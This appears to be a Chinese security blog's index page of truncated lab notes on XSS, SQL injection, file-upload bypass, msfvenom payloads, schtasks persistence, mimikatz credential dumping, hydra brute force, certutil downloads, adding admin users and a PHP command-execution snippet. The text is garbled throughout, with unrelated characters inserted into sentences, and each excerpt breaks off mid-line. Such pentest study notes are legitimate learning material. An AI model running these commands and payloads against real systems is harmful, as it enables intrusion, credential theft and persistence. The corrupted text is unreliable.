我是直接把php文件打開(kāi)的。骡楼。
XSS闖關(guān)筆記level 1 查看第一關(guān)的源碼措左,發(fā)現(xiàn)get方法直接輸入的內(nèi)容,可以直接構(gòu)造payload payload: alert(/xss/) level 2 第二關(guān)和第一關(guān)有點(diǎn)不一...
二次注入原理 二次注入可以理解成蛙酪,攻擊者先將攻擊語(yǔ)句插入到數(shù)據(jù)庫(kù)中齐苛,然后再調(diào)用攻擊語(yǔ)句,完成攻擊桂塞。 下面自己搭建環(huán)境復(fù)現(xiàn)一下 先在reg,php去插入攻擊語(yǔ)句凹蜂,usernam...
寬字節(jié)注入原理 當(dāng)數(shù)據(jù)庫(kù)編碼方式為gdk時(shí),一個(gè)漢字會(huì)占用兩個(gè)字節(jié)阁危,平常字符會(huì)占一個(gè)字節(jié) 例如:你 url編碼之后為 => %c4%e3 # url編碼之后為 => %23 ...
ps:當(dāng)時(shí)出的時(shí)候就復(fù)現(xiàn)了玛痊,但是由于種種原因(當(dāng)初粗心,沒(méi)好好留意)沒(méi)有成功狂打,今天終于成功了 目前已知受影響的phpstudy版本 phpstudy 2016版php-5.4...
kali : 192.168.3.136 windows server 2012 : 192.168.3.129 1、生成一個(gè)exe遠(yuǎn)控 msfvenom -p window...
schtasks 例子1: schtasks /create /tn "123" /tr "calc.exe" /sc onlogon 創(chuàng)建一個(gè)名字是123的計(jì)劃任務(wù)趴乡,在每次...
簡(jiǎn)單記一下看見(jiàn)的五種寫(xiě)有sql注入的情況下如何寫(xiě)shell 原文鏈接:https://manning23.github.io/2019/07/23/MYSQL%E5%AD%9...
目標(biāo)機(jī) windows server 2008 R2 第一種方法: cmd下運(yùn)行mimikatz.exe对省,然后依次輸入下面命令 privilege::debug sekurl...
今天第一次學(xué)習(xí)selenium這個(gè)庫(kù)蝗拿,在剛開(kāi)始打開(kāi)瀏覽器就踩坑,無(wú)法打開(kāi)瀏覽器蒿涎。 https://github.com/mozilla/geckodriver/release...
hydra 暴力破解工具蛹磺,可爆破很多服務(wù),例如開(kāi)機(jī)用戶名密碼 1同仆、破解ssh: hydra -l 用戶名 -P 密碼字典 -t 線程 -vV -e ns ip ssh hyd...
certutil.exe 這里用虛擬機(jī)開(kāi)一個(gè)網(wǎng)站(http://192.168.3.128)萤捆,假設(shè)外網(wǎng)網(wǎng)站,用本機(jī)(192.168.3.1) 來(lái)實(shí)驗(yàn)俗批。 下載 certutil...
今天導(dǎo)入dns模塊時(shí)一直出錯(cuò)俗或,后來(lái)老哥提醒,python里一些模塊名字不一樣岁忘,dns模塊的名字是dnspython,然后pip install dnspython成功
實(shí)驗(yàn)環(huán)境:windwos server 2003 一般windwos下新建用戶并加到管理員組: net user test /add net localgroup admin...
alias Linux alias命令用于設(shè)置指令的別名辛慰。 用戶可利用alias,自定指令的別名干像。若僅輸入alias帅腌,則可列出目前所有的別名設(shè)置。alias的效力僅及于該次登...
新手入門(mén)麻汰,用來(lái)記一些筆記速客,大佬別噴。下面記錄幾個(gè)PHP里面可以執(zhí)行系統(tǒng)命令的函數(shù)五鲫。 system() <?php $a = $_GET['cmd']; system($a);...
pass-01 嘗試上傳一個(gè)php溺职,發(fā)現(xiàn)提示不行。 前端js攔截了位喂,先將php文件后綴改為允許的格式浪耘,比如jpg,burp抓包改一下就好了塑崖。后綴改為php成功上傳七冲。 訪問(wèn)發(fā)現(xiàn)...
level 1 查看第一關(guān)的源碼,發(fā)現(xiàn)get方法直接輸入的內(nèi)容规婆,可以直接構(gòu)造payload payload: alert(/xss/) level 2 第二關(guān)和第一關(guān)有點(diǎn)不一...